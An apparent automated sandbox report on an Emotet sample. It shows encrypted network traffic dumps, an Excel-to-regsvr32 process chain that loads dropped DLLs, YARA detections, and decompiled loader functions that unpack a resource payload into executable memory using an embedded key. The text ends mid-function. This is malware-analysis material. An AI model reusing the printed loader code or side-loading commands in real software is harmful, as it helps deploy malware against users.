Mar 31, 2022 22:52:32.431747913 CEST	926	OUT	Data Raw: 16 03 03 00 92 01 00 00 8e 03 03 62 46 93 11 74 0d f6 30 e6 a7 48 ad da e0 ec 17 71 21 26 82 ff 2b 77 e6 b6 09 bf c9 87 ff fb 1d 00 00 34 c0 28 c0 27 c0 14 c0 13 00 9f 00 9e 00 39 00 33 00 9d 00 9c 00 3d 00 3c 00 35 00 2f c0 2c c0 2b c0 24 c0 23 Data Ascii: bFt0Hq!&+w4('93=<5/,+$#j@821
Mar 31, 2022 22:52:32.686058998 CEST	927	IN	Data Raw: 16 03 03 00 5d 02 00 00 59 03 03 a6 fc 43 99 43 27 47 7a 76 41 8f 4d 25 11 7a 56 f4 76 26 d2 80 57 7d ed 2f ef 81 b9 c7 28 99 43 20 8e 6e 02 d5 41 bb 58 51 5d f7 9f 39 6f 2d a7 98 b3 b9 11 8c 89 df 13 a3 48 39 a5 a9 6d 4c 7c 4a c0 28 00 00 11 ff Data Ascii: ]YCC'GzvAM%zVv&W}/(C nAXQ]9o-H9mL\|J(00[#4/jBm0*H0w10UGB10ULondon10ULondon10UGlobal Security10
Mar 31, 2022 22:52:32.686100006 CEST	927	IN	Data Raw: b3 de 4c fb 88 cb 38 ee 8f 18 d2 65 2e 3b e4 f4 bd 93 c3 f7 12 81 68 c4 c5 b8 fb de f5 25 45 ff 7f 1e 89 93 7a 06 9c 58 61 ae 9a b2 03 c2 08 66 cc cb c3 f5 f1 1d 9f a9 bc a5 fa 65 d4 00 49 1c 28 a5 7c bb 03 54 50 b1 17 32 97 9e 70 02 e5 6e 1a 71 Data Ascii: L8e.;h%EzXafeI(\|TP2pnqPGY6S~
Mar 31, 2022 22:52:32.701215029 CEST	927	OUT	Data Raw: 16 03 03 00 46 10 00 00 42 41 04 eb 01 29 dd f8 a1 a5 8c 9c 7a ec b5 ae 30 7d 76 3c 19 17 1c b9 9a 76 1b 68 5b ee ab 37 cb d1 50 01 44 99 21 c1 e2 1f d9 c3 3f b3 d5 62 cc 99 b1 bb 36 42 6a 97 c6 11 c9 34 4d 7f c4 69 50 22 0d 14 03 03 00 01 01 16 Data Ascii: FBA)z0}v<vh[7PD!?b6Bj4MiP"`;^ Rpr8yim!zXIPE*!/JT{J#zaVojB$/pI[
Mar 31, 2022 22:52:32.942020893 CEST	928	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 60 31 3d 82 43 71 bc 18 7d 99 84 59 97 e5 4c 99 80 bf 77 bc 55 35 0f 68 9f bd eb 38 be 90 49 b4 1b c2 43 55 01 a5 de 6d 7d 81 9a 2f 7b f3 b5 61 81 e2 16 0b 87 2d ac b8 fd f7 66 46 2a b7 b8 65 42 16 a8 5b 3d b3 ac 40 Data Ascii: `1=Cq}YLwU5h8ICUm}/{a-fF*eB[=@G){bM[BR't
Mar 31, 2022 22:52:35.707556963 CEST	993	OUT	Data Raw: 17 03 03 02 00 ac a2 4c 40 6a 9f 19 3c 91 54 0f ff 15 75 28 07 5f 6f 7e bc 33 55 dc 55 eb f3 38 19 9b da b5 43 86 ab 0d 37 b3 29 86 bf c4 7a 0e bf f7 d9 43 8f 1a 54 0d bc ef ee 85 5a e7 ac 06 36 8c c3 92 12 36 de 9b a9 fd ff 15 31 16 98 1f d5 27 Data Ascii: L@j<Tu(_o~3UU8C7)zCTZ661's30OD`9 EP!Dqf)o2(K\pTi:C0;%G/"F0@BX/'QMhZY9uaCp:S7"tAf9\|@1mxj
Mar 31, 2022 22:52:36.604301929 CEST	994	IN	Data Raw: 17 03 03 04 b0 c0 69 b9 d5 a4 19 77 f0 82 98 ec 91 d4 75 3a 66 03 56 cc 76 a9 aa c2 c6 f1 0e 1f 61 4d 73 96 5c 19 7c 9e 06 85 6f a2 46 14 cb 8f f8 fc de af 97 4e 3a c3 2f 75 3e 6e a7 0f e1 d5 98 a2 2a be c8 94 04 88 bd c9 4b 1d 90 f4 b0 cb 56 35 Data Ascii: iwu:fVvaMs\\|oFN:/u>nKV5II+z((Sd\K@TiJ`$~>AOhA3_a).I?"a=~{@N;YxrYvFO_yMV%({0%fe:
Mar 31, 2022 22:52:39.605443954 CEST	995	IN	Data Raw: 15 03 03 00 50 ab 33 0c d9 4d 2b 49 37 ae 97 9d 2f c3 7a df 5c af 49 92 bf 62 bb 65 70 2a 46 46 bf 04 5a df c6 e7 27 c7 96 11 d1 e6 df 92 4f 8f b3 49 4b 38 86 43 6e c0 d8 ab 59 73 1d 5f 2c b8 a7 cf d8 02 60 fd f9 94 01 37 3b 1f 29 3e b0 1a 20 56 Data Ascii: P3M+I7/z\Ibep*FFZ'OIK8CnYs_,`7;)> V

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 1528, Parent PID: 576

General

Target ID:	0
Start time:	22:51:42
Start date:	31/03/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f7e0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 468, Parent PID: 1528

General

Target ID:	3
Start time:	22:51:51
Start date:	31/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Imagebase:	0xdc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2140, Parent PID: 468

General

Target ID:	4
Start time:	22:51:52
Start date:	31/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"
Imagebase:	0xdc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 732, Parent PID: 2140

General

Target ID:	5
Start time:	22:51:55
Start date:	31/03/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"
Imagebase:	0xdc0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 468, Parent PID: 1528COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	38%
Signature Coverage:	32.2%
Total number of Nodes:	363
Total number of Limit Nodes:	9

Executed Functions

Function 10009530 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 301
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E10009530(void* __ebx, void* __edi, void* __esi) {
				void* _t35;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				struct HRSRC__* _t64;
				void* _t72;
				void* _t75;
				signed int _t81;
				void* _t83;
				signed int _t89;
				signed int _t96;
				signed int _t105;
				signed int _t111;
				signed int _t114;
				signed int _t115;
				long _t121;
				signed int _t122;
				void* _t128;
				struct HINSTANCE__* _t129;
				signed int _t130;
				signed int _t131;
				void* _t135;
				signed int _t137;
				void* _t139;
				struct HRSRC__* _t140;
				int _t141;
				signed int _t145;
				void* _t157;
				void* _t175;
				void* _t179;
				void* _t180;

				if( *((intOrPtr*)(_t175 + 0xc)) != 1) {
					L6:
					return 1;
				} else {
					_t35 = E1000174E();
					_t184 = _t35;
					if(_t35 != 0) {
						_push(0x1008f260);
						E1001A7F6();
						__eflags = 0;
						return 0;
					} else {
						_t83 = 0;
						 *0x1008f214 = 0;
						 *0x1008f218 = 0;
						 *0x1008f21c = 0;
						 *0x1008f224 = 0;
						 *0x1008f220 = 0;
						 *0x1008f228 = 0;
						 *0x1008f22c = 0;
						_t139 = E100015C8(_t184, 0x28b4cee6, 0x31c6c0a1, 0x628ad09, 0x1a322e2e, 0x3801a8f2, 0x75a949e0);
						_t39 = E100015C8(_t184, 0x3446e98c, 0x348b2998, 0x118db97f, 0x2d34cc91, 0x1c9cdc39, 0xb4f25bbb);
						_t128 = E100015C8(_t184, 0x106d66fc, 0x108d4cdc, 0x156af904, 0x20e23fe3, 0xe094f82, 0xb9f143fe);
						_push(0x21f9a333);
						_push(_t128);
						_t41 = E100017DF();
						_push(0x2341a32f);
						_push(_t128);
						 *0x10092e3c = _t41;
						_t42 = E100017DF();
						_push(0x95a5948e);
						_push(_t128);
						 *0x10092e38 = _t42;
						_t43 = E100017DF();
						_push(0xb012a3dd);
						_push(_t128);
						 *0x10092e0c = _t43;
						_t44 = E100017DF();
						_push(0xca1e4bb);
						_push(_t128);
						 *0x10092e1c = _t44;
						_t45 = E100017DF();
						_push(0x2401e109);
						_push(_t128);
						 *0x10092e44 = _t45;
						_t46 = E100017DF();
						_push(0x23a9e504);
						_push(_t128);
						 *0x10092e40 = _t46;
						_t47 = E100017DF();
						_push(0x37ac3de5);
						_push(_t139);
						 *0x10092e54 = _t47;
						 *0x10092df8 = E100017DF();
						_push(0x1e5bd628);
						_push(_t139);
						_t49 = E100017DF();
						_push(0x49c53c3b);
						_push(_t139);
						 *0x10092dfc = _t49;
						_t50 = E100017DF();
						_push(0xe900a744);
						_push(_t139);
						 *0x10092e24 = _t50;
						_t51 = E100017DF();
						_push(0x1f8137ac);
						_push(_t139);
						 *0x10092e28 = _t51;
						_t52 = E100017DF();
						_push(0x22486e43);
						_push(_t139);
						 *0x10092e2c = _t52;
						_t53 = E100017DF();
						_push(0xf4444938);
						_push(_t139);
						 *0x10092e50 = _t53;
						_t54 = E100017DF();
						_push(0xb2c610ee);
						_push(_t139);
						 *0x10092e14 = _t54;
						_t55 = E100017DF();
						_push(0x141396b7);
						_push(_t39);
						 *0x10092e10 = _t55;
						_t56 = E100017DF();
						_t179 = _t175 + 0xc8;
						 *0x10092e34 = _t56;
						_push(0x16be9daf);
						_push(_t139);
						_t57 = E100017DF();
						_push(0x8dc95e47);
						_push(_t139);
						 *0x10092e08 = _t57;
						_t58 = E100017DF();
						_push(0x14fdbcd3);
						_push(_t139);
						 *0x10092e18 = _t58;
						_t59 = E100017DF();
						_push(0x9208c63f);
						_push(_t139);
						 *0x10092e04 = _t59;
						_t60 = E100017DF();
						_push(0x18b0e1b);
						_push(_t139);
						 *0x10092e58 = _t60;
						_t61 = E100017DF();
						_push(0x3948970c);
						_push(_t139);
						 *0x10092e20 = _t61;
						_t62 = E100017DF();
						_push(0xe4e50b99);
						_push(_t139);
						 *0x10092e48 = _t62;
						_t63 = E100017DF();
						_t129 =  *(_t179 + 0x50);
						_t180 = _t179 + 0x38;
						 *0x10092e30 = _t63;
						_t64 = FindResourceW(_t129, 0x28fe, L"JKXXXXXT"); // executed
						_t140 = _t64;
						 *((intOrPtr*)(_t180 + 0x18)) = LoadResource(_t129, _t140);
						_t141 = SizeofResource(_t129, _t140);
						 *(_t180 + 0x1c) = _t141;
						if( *0x10092dfc == 0) {
							_t130 =  *0x1008f214; // 0x0
							_t96 =  *0x1008f220; // 0x0
							_t23 = _t130 - 1; // -1
							_t24 = _t23 *  *0x1008f224 - _t96 + 0x40; // 0x3f
							_t25 = _t96 + 2; // 0x2
							_t113 = _t25;
							_t114 =  *0x1008f228; // 0x0
							_t115 =  *0x1008f224; // 0x0
							_t131 =  *0x1008f21c; // 0x0
							_t29 = (_t115 + 2) * _t130 + _t131 + (( ~_t25 << 0x1f) - _t113 + _t114) *  *0x1008f218 + ((_t96 << 0x1e) - _t96) * 2 + 0x2000; // 0x2000
							_t121 = (_t115 + 0x00000002) * _t130 + _t131 + (( ~_t25 << 0x0000001f) - _t113 + _t114) *  *0x1008f218 + ((_t96 << 0x0000001e) - _t96) * 0x00000002 + _t29 | _t23 *  *0x1008f224 - _t96 + 0x00001000;
							__eflags = _t121;
							_t72 = VirtualAlloc(0, _t141, _t121, _t24);
						} else {
							_t122 =  *0x1008f214; // 0x0
							_t81 =  *0x1008f224; // 0x0
							_t137 =  *0x1008f218; // 0x0
							_t145 =  *0x1008f228; // 0x0
							_t89 =  *0x1008f21c; // 0x0
							_t105 =  *0x1008f220; // 0x0
							_t19 = _t122 + 0x7fffffff; // 0x7fffffff
							_t111 =  *0x1008f220; // 0x0
							_t21 = ( ~_t137 << 0x1f) - _t137 + _t145 + (( ~_t81 << 0x1f) - _t81 + _t89 + _t19 * _t137) * _t111 + 0x2000; // 0x2000
							_t83 = 0;
							_t141 =  *(_t180 + 0x28);
							_t72 =  *0x10092dfc(0xffffffff, 0, _t141, ( ~_t137 << 0x0000001f) - _t137 + _t145 + (( ~_t81 << 0x0000001f) - _t81 + _t89 + _t19 * _t137) * _t111 + _t21 | (_t122 - 0x00000001) * _t81 - _t111 + 0x00001000, ((_t122 + _t122 * 2 - _t81 + _t81 * 2) * _t137 + _t81 + _t81 * 2) * _t137 + (_t145 + _t145 * 2 - _t122 + _t122 * 2 - 6) * _t145 + (_t122 * _t122 + 2) * _t89 + (_t122 * _t122 + 2) * _t89 * 2 - _t105 + _t105 * 8 - (_t81 + _t81 * 2 << 1) + 0x40, 0);
						}
						_t135 = _t72;
						memcpy(_t135,  *(_t180 + 0x10), _t141);
						_t75 = malloc(0x1dd9); // executed
						_t157 = _t75;
						E10001730();
						E1000175D();
						 *0x10092e0c(_t157, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t157, _t135, _t141, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t157, "s^ErJIZwQ%B4X_#*TUuU32vx(c9_@8*C!Bi7dX7o(_W*r^TEFy81wRkt4_2818IxTQ9h*sFns_@w$5SkehbMpuGh+NpaFC(5S!*ptdbd?rg", 0x6c);
						 *0x10092e80 = E100013AC(_t135, _t141);
						 *0x10092e5c( *((intOrPtr*)(_t180 + 0x64)), 1, _t83);
						goto L6;
					}
				}
			}

0x10009536
0x10009944
0x1000994a
0x1000953c
0x1000953c
0x10009541
0x10009543
0x1000994d
0x10009952
0x1000995a
0x1000995d
0x10009549
0x10009561
0x1000956d
0x10009573
0x10009579
0x1000957f
0x10009585
0x1000958b
0x10009591
0x100095ba
0x100095bc
0x100095e9
0x100095eb
0x100095f0
0x100095f1
0x100095f6
0x100095fb
0x100095fc
0x10009601
0x10009606
0x1000960b
0x1000960c
0x10009611
0x10009616
0x1000961b
0x1000961c
0x10009621
0x10009626
0x1000962b
0x1000962c
0x10009631
0x10009636
0x1000963b
0x1000963c
0x10009641
0x10009646
0x1000964b
0x1000964c
0x10009651
0x10009656
0x1000965b
0x1000965c
0x10009669
0x1000966e
0x10009673
0x10009674
0x10009679
0x1000967e
0x1000967f
0x10009684
0x10009689
0x1000968e
0x1000968f
0x10009694
0x10009699
0x1000969e
0x1000969f
0x100096a4
0x100096a9
0x100096ae
0x100096af
0x100096b4
0x100096b9
0x100096be
0x100096bf
0x100096c4
0x100096c9
0x100096ce
0x100096cf
0x100096d4
0x100096d9
0x100096de
0x100096df
0x100096e4
0x100096e9
0x100096ec
0x100096f1
0x100096f6
0x100096f7
0x100096fc
0x10009701
0x10009702
0x10009707
0x1000970c
0x10009711
0x10009712
0x10009717
0x1000971c
0x10009721
0x10009722
0x10009727
0x1000972c
0x10009731
0x10009732
0x10009737
0x1000973c
0x10009741
0x10009742
0x10009747
0x1000974c
0x10009751
0x10009752
0x10009757
0x1000975c
0x10009760
0x10009763
0x10009773
0x10009779
0x10009785
0x1000978f
0x10009798
0x1000979c
0x1000985c
0x10009862
0x10009868
0x10009874
0x1000987d
0x1000987d
0x10009889
0x10009891
0x100098a4
0x100098b8
0x100098bf
0x100098bf
0x100098c4
0x100097a2
0x100097a2
0x100097a8
0x100097ad
0x100097c6
0x100097e1
0x100097f2
0x10009804
0x10009815
0x1000983a
0x10009847
0x1000984c
0x10009854
0x10009854
0x100098ca
0x100098d3
0x100098de
0x100098e4
0x100098fd
0x10009914
0x1000991d
0x10009931
0x1000993a
0x00000000
0x10009943
0x10009543

APIs

FindResourceW.KERNEL32(?,000028FE,JKXXXXXT), ref: 10009773
LoadResource.KERNEL32(?,00000000), ref: 1000977D
SizeofResource.KERNEL32(?,00000000), ref: 10009789
VirtualAllocExNuma.KERNEL32(000000FF,00000000,?,00002000,?,00000000), ref: 10009854
VirtualAlloc.KERNEL32(00000000,00000000,00002000,0000003F), ref: 100098C4
memcpy.MSVCRT ref: 100098D3
malloc.MSVCRT ref: 100098DE
??3@YAXPAX@Z.MSVCRT ref: 1000991D

Strings

s^ErJIZwQ%B4X_#*TUuU32vx(c9_@8*C!Bi7dX7o(_W*r^TEFy81wRkt4_2818IxTQ9h*sFns_@w$5SkehbMpuGh+NpaFC(5S!*ptdbd?rg, xrefs: 100098E8
JKXXXXXT, xrefs: 10009768

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
String ID: JKXXXXXT$s^ErJIZwQ%B4X_#*TUuU32vx(c9_@8*C!Bi7dX7o(_W*r^TEFy81wRkt4_2818IxTQ9h*sFns_@w$5SkehbMpuGh+NpaFC(5S!*ptdbd?rg
API String ID: 3024364686-4231267435
Opcode ID: bb068903be71e1f3d470ed9610414aef17ca9c40b19578a509fb8e5abdc355ed
Instruction ID: 0a7a800cfef4ff0d3f861d3c668680c4dbcd903738d3c3395e3da202742ff214
Opcode Fuzzy Hash: bb068903be71e1f3d470ed9610414aef17ca9c40b19578a509fb8e5abdc355ed
Instruction Fuzzy Hash: 68A10675805328AFF708EF79DDC5CA67BB9FF45240700412FF50AE766AEAB069018B94

Uniqueness

Uniqueness Score: -1.00%

Function 003D31D5 Relevance: 11.7, Strings: 9, Instructions: 414
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E003D31D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t392;
				signed int _t397;
				signed int _t407;
				signed int _t408;
				signed int _t424;
				signed int _t427;
				signed int _t435;
				signed int _t442;
				signed int _t447;
				signed int _t449;
				intOrPtr _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				void* _t474;
				intOrPtr* _t501;
				void* _t503;
				void* _t504;
				void* _t505;
				signed int _t506;
				signed int* _t511;
				void* _t514;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t392);
				_v8 = 0xfc729;
				_t511 =  &(( &_v68)[6]);
				_t447 = 0;
				_v4 = 0;
				_t504 = 0x825ce;
				_v68 = 0x48d42e;
				_t509 = 0;
				_t449 = 0x3c;
				_v68 = _v68 / _t449;
				_v68 = _v68 | 0x5dff7ffe;
				_v68 = _v68 ^ 0x5dfd7ffe;
				_v44 = 0x11fdb7;
				_v44 = _v44 >> 1;
				_v44 = _v44 ^ 0x0008dedb;
				_t501 = _v20;
				_v24 = _v68;
				_t397 = _v44;
				_v56 = _v44;
				while(1) {
					L1:
					_t474 = 0x58cf1;
					while(1) {
						_t514 = _t504 - 0x5ca55;
						if(_t514 <= 0) {
						}
						L3:
						if(_t514 == 0) {
							_v48 = 0x150ba6;
							_v48 = _v48 + 0xffff3219;
							_t453 = 0x6a;
							_v48 = _v48 * 0x1e;
							_v48 = _v48 ^ 0x025f3c63;
							_v64 = 0x1d952f;
							_v64 = _v64 * 7;
							_t454 = 0x7e;
							_v64 = _v64 / _t453;
							_v64 = _v64 | 0x67ff497e;
							_v64 = _v64 ^ 0x67fe99df;
							_v60 = 0xd6bd39;
							_v60 = _v60 << 5;
							_v60 = _v60 * 0x29;
							_t455 = 0x53;
							_v60 = _v60 / _t454;
							_v60 = _v60 ^ 0x009236dd;
							_v32 = 0x6034cb;
							_v32 = _v32 / _t455;
							_v32 = _v32 ^ 0x000a422d;
							_t295 =  &_v32; // 0xa422d
							_t407 = E003D99D4(_v48, _a8, _v64, _v60,  *_t501,  *_t295); // executed
							_t511 =  &(_t511[4]);
							_v28 = _t407;
							__eflags = _t407;
							_t505 = 0xb82ad;
							_t408 = 0x3de19;
							L19:
							_t504 =  !=  ? _t408 : _t505;
							goto L11;
						} else {
							if(_t504 == 0x89e1) {
								_v32 = 0xe28aab;
								_v32 = _v32 << 0xc;
								_v32 = _v32 ^ 0x28a12707;
								_v68 = 0x4d6b35;
								_v68 = _v68 | 0x806cbcfc;
								_v68 = _v68 ^ 0xbcfcbfd2;
								_v68 = _v68 + 0xef26;
								_v68 = _v68 ^ 0x3c9b5eae;
								_v64 = 0xf77186;
								_v64 = _v64 ^ 0xc5aa5933;
								_t457 = 0x5a;
								_v64 = _v64 * 0x4a;
								_v64 = _v64 ^ 0x143a8087;
								_v64 = _v64 ^ 0x18da7b4f;
								_v60 = 0xe0143;
								_v60 = _v60 >> 2;
								_v60 = _v60 | 0xd85640b2;
								_v60 = _v60 / _t457;
								_t386 =  &_v60;
								 *_t386 = _v60 ^ 0x026c3d84;
								__eflags =  *_t386;
								return E003C79D0(_v32, _v68,  *_t386, _v64, _t447, _v60);
							}
							if(_t504 == 0x102f6) {
								_v48 = 0xbd43ab;
								_v48 = _v48 + 0xffff0ef0;
								_v48 = _v48 >> 6;
								_v48 = _v48 ^ 0x000ef40c;
								_v32 = 0x8f4250;
								_v32 = _v32 << 0xb;
								_v32 = _v32 ^ 0x7a1b9488;
								_v60 = 0xc3acd4;
								_v60 = _v60 >> 7;
								_v60 = _v60 + 0xffff7c34;
								_t459 = 0x7c;
								_v60 = _v60 * 0x6e;
								_v60 = _v60 ^ 0x00694a0d;
								_v36 = 0xf34f42;
								_v36 = _v36 | 0x554a362b;
								_v36 = _v36 ^ 0x55f52e13;
								_v40 = 0xec2662;
								_v40 = _v40 >> 1;
								_v40 = _v40 ^ 0x007c6384;
								_v64 = 0xf28437;
								_v64 = _v64 >> 0xe;
								_t460 = 0x33;
								_v64 = _v64 / _t459;
								_v64 = _v64 + 0xa0ae;
								_v64 = _v64 ^ 0x000612ed;
								_v68 = 0xb0db41;
								_v68 = _v68 / _t460;
								_v68 = _v68 << 1;
								_t461 = 0x2c;
								_v68 = _v68 * 0x2e;
								_v68 = _v68 ^ 0x013754e5;
								_v52 = 0xfe5455;
								_v52 = _v52 << 1;
								_v52 = _v52 / _t461;
								_v52 = _v52 ^ 0x0002bb9b;
								_t424 = E003D7439(_v48, _v52 % _t461, _v32,  &_v12, _t461, _t461,  &_v20, _a8, _v60, _v36, _t461, _v40, _t447, _v24, _v64, _v68, _t461, _v52);
								_t511 =  &(_t511[0x10]);
								__eflags = _t424;
								if(__eflags == 0) {
									goto L10;
								} else {
									_v48 = 0xd92493;
									_v48 = _v48 + 0xffffcfee;
									_v48 = _v48 | 0x3922433f;
									_v48 = _v48 ^ 0x39faf79f;
									_v36 = 0x91da47;
									_v36 = _v36 + 0xffffa564;
									_v36 = _v36 ^ 0x009a608a;
									_v32 = 0xb8acae;
									_v32 = _v32 << 1;
									_v32 = _v32 ^ 0x0171d0fa;
									_t427 = E003C48C6();
									_t504 = 0x5ca55;
									_t397 = _v20 * 0x2c + _t447;
									_t503 = _t427 % _v48 * 0x2c + _t447;
									_v44 = _t397;
									__eflags = _t503 - _t397;
									_t501 =  >=  ? _t447 : _t503;
									goto L12;
								}
								L33:
							} else {
								if(_t504 == 0x35be6) {
									_v60 = 0x184c45;
									_t464 = 0x39;
									_v60 = _v60 / _t464;
									_v60 = _v60 | 0xdd448077;
									_v60 = _v60 ^ 0xdd41617b;
									_v48 = 0x32e51b;
									_v48 = _v48 | 0x1af7d5ab;
									_v48 = _v48 ^ 0x1afb0cff;
									_v68 = 0xabe2e;
									_v68 = _v68 ^ 0x80ba551b;
									_v68 = _v68 ^ 0x27dcd715;
									_v68 = _v68 >> 0xe;
									_v68 = _v68 ^ 0x000701d0;
									_push(_t464);
									_push(_t464); // executed
									_t397 = E003C8D52(_t464, _v24, __eflags); // executed
									_t447 = _t397;
